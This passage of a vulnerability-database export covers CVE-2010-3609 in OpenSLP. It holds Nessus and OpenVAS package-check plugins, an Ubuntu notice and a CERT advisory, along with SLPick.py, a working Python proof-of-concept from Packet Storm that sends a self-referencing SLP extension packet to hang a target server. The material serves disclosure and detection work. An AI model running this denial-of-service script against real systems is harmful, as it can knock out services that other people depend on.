script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. 
/ NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(6\\.06|8\\.04|9\\.10|10\\.04|10\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 9.10 / 10.04 / 10.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libslp1\", pkgver:\"1.2.1-5ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.5ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.6ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libslp1\", pkgver:\"1.2.1-7.7ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libslp1\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:13:46", "description": "openslp: denial of service 
vulnerability (CVE-2010-3609)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-05-29T00:00:00", "title": "Fedora 20 : openslp-1.2.1-22.fc20 (2015-7561)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609", "CVE-2012-4428"], "modified": "2015-05-29T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:openslp"], "id": "FEDORA_2015-7561.NASL", "href": "https://www.tenable.com/plugins/nessus/83890", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-7561.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83890);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2010-3609\", \"CVE-2012-4428\");\n script_xref(name:\"FEDORA\", value:\"2015-7561\");\n\n script_name(english:\"Fedora 20 : openslp-1.2.1-22.fc20 (2015-7561)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"openslp: denial of service vulnerability (CVE-2010-3609)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=684294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=857242\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159059.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6f58f5f1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openslp package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openslp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 
os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"openslp-1.2.1-22.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openslp\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:35:21", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3609"], "description": "It was discovered that OpenSLP incorrectly handled certain corrupted \nmessages. A remote attacker could send a specially crafted packet to \nthe OpenSLP server and cause it to hang, leading to a denial of service.", "edition": 5, "modified": "2011-04-20T00:00:00", "published": "2011-04-20T00:00:00", "id": "USN-1118-1", "href": "https://ubuntu.com/security/notices/USN-1118-1", "title": "OpenSLP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:16", "bulletinFamily": "info", "cvelist": ["CVE-2010-3609"], "description": "### Overview \n\nOpenSLP contains a vulnerability in the handling of packets containing malformed extensions, which can result in a denial-of-service condition.\n\n### Description \n\nService Location Protocol is an IETF standards track protocol that provides a framework to allow networking applications to discover the existence, location, and configuration of networked services in enterprise networks. 
The OpenSLP project is an effort to develop an open-source implementation of Service Location Protocol. When OpenSLP parses an SLP packet containing malformed extensions, the extensions parser will enter an infinite loop, causing a denial-of-service condition.\n\nIf an attacker creates a packet containing a \"next extension offset\" pointing to itself or to a previous extension, the extension's parser will enter an infinite loop consuming 100% of the CPU. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to create a denial-of-service condition. \n \n--- \n \n### Solution \n\n**Upgrade or apply a patch from the vendor** \n \nPatches and updated versions of the software have been released to address this issue. Please see the Vendor Information section of this document for more information. \n \nUsers who compile their OpenSLP software from the svn distribution should check out the latest svn revision. According to the [revision update](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>) this vulnerability has been resolved in [revision 1647](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>). \n \n--- \n \n### Vendor Information\n\n### Novell, Inc. 
Affected\n\nNotified: August 11, 2010 Updated: January 14, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n\n### SUSE Linux Affected\n\nNotified: October 07, 2010 Updated: March 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n\n### Ubuntu Affected\n\nUpdated: April 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.7ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.6ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.5ubuntu0.1>\n * <https://launchpad.net/ubuntu/+source/openslp-dfsg/1.2.1-7.1ubuntu0.2>\n * <https://launchpad.net/ubuntu/+source/openslp/1.2.1-5ubuntu0.2>\n\n### VMware Affected\n\nNotified: August 12, 2010 Updated: March 16, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.vmware.com/security/advisories/VMSA-2011-0004.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * 
[http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647](<http://openslp.svn.sourceforge.net/viewvc/openslp?view=revision&revision=1647>)\n * <http://support.novell.com/security/cve/CVE-2010-3609.html>\n * <http://www.vmware.com/security/advisories/VMSA-2011-0004.html>\n\n### Acknowledgements\n\nThanks to Nicolas Gregoire of Agarri for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2010-3609](<http://web.nvd.nist.gov/vuln/detail/CVE-2010-3609>) \n---|--- \n**Severity Metric:** | 0.58 \n**Date Public:** | 2011-03-21 \n**Date First Published:** | 2011-03-21 \n**Date Last Updated: ** | 2011-04-21 15:28 UTC \n**Document Revision: ** | 23 \n", "modified": "2011-04-21T15:28:00", "published": "2011-03-21T00:00:00", "id": "VU:393783", "href": "https://www.kb.cert.org/vuls/id/393783", "type": "cert", "title": "OpenSLP denial of service vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:45", "description": "", "published": "2011-07-26T00:00:00", "type": "packetstorm", "title": "SLP (Service Location Protocol) Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3609"], "modified": "2011-07-26T00:00:00", "id": "PACKETSTORM:103443", "href": "https://packetstormsecurity.com/files/103443/SLP-Service-Location-Protocol-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n \n''' ================================== \nPseudo documentation \n================================== ''' \n \n# SLPick, extension DoS release \n# by Nicolas Gregoire \n \n''' ================================== \nImports \n================================== ''' \n \nimport getopt \nimport re \nimport sys \nimport binascii \nimport struct \nimport socket \nimport os \n \n \n''' ================================== \nDefault values \n================================== ''' \n \nversion = '0.4' \nmode = 'unicast' 
\nsource = 'N/A' \ntarget = 'N/A' \nxid = '\\x12\\x34' \nport = 427 \nnb = 1 \nreq = 'sr' \n \n''' ================================== \nStandard functions \n================================== ''' \n \n# Some nice formatting \ndef zprint(str): \nprint '[=] ' + str \n \n# Function displaying CLI arguments \ndef showUsage(): \nprint 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]' \nprint '\\t[-h] Help (this text)' \nprint '\\t[-m] Mode : tcp / unicast / broadcast / multicast (default is \"' + mode + '\")' \nprint '\\t[-p] Port : default is \"' + str(port) + '\"' \nprint '\\t[-s] Source IP Adress : no default (used only in multicast mode)' \nprint '\\t[-t] Target IP Adress : no default (forced in multicast mode)' \nprint '\\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)' \nprint '\\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)' \nsys.exit(1) \n \n# Function parsing parameters \ndef getArguments(): \ntry: \noptlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:') \nexcept getopt.GetoptError: \nshowUsage() \nfor opt in optlist: \nif opt[0] == '-h': \nshowUsage() \nif opt[0] == '-p': \nglobal port \nport = opt[1] \nif opt[0] == '-s': \nglobal source \nsource = opt[1] \nif opt[0] == '-t': \nglobal target \ntarget = opt[1] \nif opt[0] == '-m': \nglobal mode \nmode = opt[1] \nif opt[0] == '-n': \nglobal nb \nnb = int(opt[1]) \nif opt[0] == '-r': \nglobal req \nreq = opt[1] \n \n# Function checking parameters \ndef checkArguments(): \nif (mode == 'multicast'): \n# XID : must be 0 in multicast mode \n# Target IP : default SLP multicast address \n# Source IP : address of the local interface \nglobal xid \nxid = '\\x00\\x00' \nzprint('Forcing XID to \"0\"') \nglobal target \ntarget = '239.255.255.253' \nzprint('Forcing target IP to \"' + target + '\"') \nif (source != 'N/A') : \nzprint('Forcing source IP to \"' + source + '\"') \nelse: \nzprint('You need to force the 
source address with \"-s\" !') \nshowUsage() \nelif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'): \n# Target IP : must be defined \nif (target == 'N/A') : \nzprint('Invalid target !') \nshowUsage() \nelse : \nzprint('Invalid mode !') \nshowUsage() \n \n''' ================================== \nSLP functions \n================================== ''' \n \n# Define payload of type \"Service Request\" \ndef getServRequest(): \n \nzprint('Creating payload of type \"Service Request\"') \n \n# Function type \nf = '\\x01' \n# Empty fields \nprevious_list_length = '\\x00\\x00' \npredicate_length = '\\x00\\x00' \nscope_length = '\\x00\\x00' \nspi_length = '\\x00\\x00' \n# Variable-size fields \nservice = 'service:directory-agent' \nservice_length = struct.pack('!h', len(service)) \n# Create message \nm = previous_list_length + service_length + service \nm += predicate_length + scope_length + spi_length \n \nreturn(f, m) \n \n# Define payload of type \"Attribute Request\" \ndef getAttrRequest(): \n \nzprint('Creating payload of type \"Attribue Request\"') \n \n# Function type \nf = '\\x06' \n# Empty fields \nprevious_list_length = '\\x00\\x00' \ntag_length = '\\x00\\x00' \nspi_length = '\\x00\\x00' \n# Variable-size fields \nurl = 'http://www.agarri.fr/' \nurl_length = struct.pack('!h', len(url)) \nscope = 'default' \nscope_length = struct.pack('!h', len(scope)) \n# Create message \nm = previous_list_length \nm += url_length + url + scope_length + scope \nm += tag_length + spi_length \n \nreturn(f, m) \n \n# Define the function creating the full SLP packet \ndef createPacket(function, message): \n \nzprint('Adding headers and trailers') \n \n# SLP Version \nversion = '\\x02' \n# Set the 'Multicast required' flag to 1 \nif (mode == 'broadcast' or mode == 'multicast'): \nflags = '\\x20\\x00' \nelse: \nflags = '\\x00\\x00' \n \n####################################################### \n# Here's the bug !!!! 
\n####################################################### \nzprint('Using ' + str(nb) + ' extension(s)') \nif (nb == 0): \n# No extension == no bug \nnext_ext_offset = '\\x00\\x00\\x00' \nextension = '' \nelif (nb == 1): \n# Loop over itself \nnext_ext_offset = '\\x00\\x00\\x05' \nextension = '' \nelif (nb == 2) : \n# Point to another extension located at the end of the packet \n# TODO : Calculate it at runtime \nif (req == 'sr'): \nnext_ext_offset = '\\x00\\x00\\x31' \nelse : \nnext_ext_offset = '\\x00\\x00\\x36' \n# OpenSLP : extid should be < 0x4000 or > 0x7FFF \next_id = '\\xBA\\xBE' \n# Loop over itself, 0x05 (back to previous extension) should work too \next_nextoffset = next_ext_offset \n# Could be anything \next_data = '\\x22\\x22' \n# Create the trailing extension \nextension = ext_id + ext_nextoffset + ext_data \nelse: \nprint 'Wrong number of extensions' \nsys.exit(1) \n \n# Variable-size headers \nlang = 'en' \nlang_length = struct.pack('!h', len(lang)) \n \n# Assemble headers \nheaders = flags + next_ext_offset + xid + lang_length + lang \n \n# Packet = version + function + overall size + headers + message + extension \npacket = version + function + '\\x00' \npacket += struct.pack('!h', len(headers + message + extension) + 5) \npacket += headers + message + extension \n \nreturn packet \n \n''' ================================== \nSend packet via TCP or UDP \n================================== ''' \n \n# Send via TCP \ndef sendTcpPacket(packet): \n \nzprint('Sending packet via TCP [' + target + ']') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(3) \ntry: \ns.connect((target, port)) \nexcept socket.error: \nzprint('Socket error (port closed ?)') \nsys.exit(1) \ns.send(packet) \ns.close \n \n# Send via unicast UDP \ndef sendUnicastPacket(packet): \n \nzprint('Sending packet via Unicast UDP [' + target + ']') \ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) \ns.sendto( packet, (target, port) ) \n \n# Send via broadcast UDP 
\ndef sendBroadcastPacket(packet): \n \nzprint('Sending packet via Broadcast UDP [' + target + ']') \ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM ) \ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) \ns.sendto( packet, (target, port) ) \n \n# Send via multicast UDP \ndef sendMulticastPacket(packet): \n \nzprint('Sending packet via Multicast UDP [' + target + ']') \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) \nsock.bind((source, 6666)) # Select an interface (and an evil port ;-) \nsock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) \nsock.sendto(packet, (target, port) ); \n \n''' ================================== \nMain code \n================================== ''' \n \n# Print banner \nzprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)') \n \n# Set options \ngetArguments() \ncheckArguments() \n \n# Which payload ? \nif (req == 'ar'): \nfunc, payload = getAttrRequest() \nelse : \nfunc, payload = getServRequest() \n \n# Add headers and trailers (including extensions) \npacket = createPacket(func, payload) \n \n# TCP \nif (mode == 'tcp'): \nsendTcpPacket(packet) \n# UDP \nelif (mode == 'unicast'): \nsendUnicastPacket(packet) \nelif (mode == 'broadcast'): \nsendBroadcastPacket(packet) \nelif (mode == 'multicast'): \nsendMulticastPacket(packet) \n \n# Exit \nzprint('Exit') \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/103443/SLPick.py.txt"}], "openvas": [{"lastseen": "2019-05-29T18:39:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1118-1", "modified": "2019-03-13T00:00:00", "published": "2011-05-10T00:00:00", "id": "OPENVAS:1361412562310840637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840637", "type": "openvas", "title": "Ubuntu Update for openslp-dfsg USN-1118-1", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1118_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for openslp-dfsg USN-1118-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1118-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840637\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-10 14:04:15 +0200 (Tue, 10 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"USN\", value:\"1118-1\");\n script_cve_id(\"CVE-2010-3609\");\n script_name(\"Ubuntu Update for openslp-dfsg USN-1118-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|9\\.10|6\\.06 LTS|10\\.10|8\\.04 LTS)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1118-1\");\n script_tag(name:\"affected\", value:\"openslp-dfsg on Ubuntu 10.10,\n Ubuntu 10.04 LTS,\n Ubuntu 9.10,\n Ubuntu 8.04 LTS,\n Ubuntu 6.06 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that OpenSLP incorrectly handled certain corrupted\n messages. A remote attacker could send a specially crafted packet to\n the OpenSLP server and cause it to hang, leading to a denial of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.6ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.5ubuntu0.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-5ubuntu0.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.7ubuntu0.1\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) 
exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libslp1\", ver:\"1.2.1-7.1ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-06T13:07:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3609"], "description": "Check for the Version of openslp", "modified": "2018-01-05T00:00:00", "published": "2012-08-24T00:00:00", "id": "OPENVAS:831727", "href": "http://plugins.openvas.org/nasl.php?oid=831727", "type": "openvas", "title": "Mandriva Update for openslp MDVSA-2012:141 (openslp)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for openslp MDVSA-2012:141 (openslp)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in openslp:\n\n The extension parser in slp_v2message.c in OpenSLP 1.2.1 allows\n remote attackers to cause a denial of service (infinite loop) via a\n packet with a next extension offset that references this extension\n or a previous extension (CVE-2010-3609).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"openslp on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:141\");\n script_id(831727);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-24 09:57:24 +0530 (Fri, 24 Aug 2012)\");\n script_cve_id(\"CVE-2010-3609\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:141\");\n script_name(\"Mandriva Update for openslp MDVSA-2012:141 (openslp)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openslp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", 
\"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenslp1\", rpm:\"libopenslp1~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenslp1-devel\", rpm:\"libopenslp1-devel~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.1~12.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 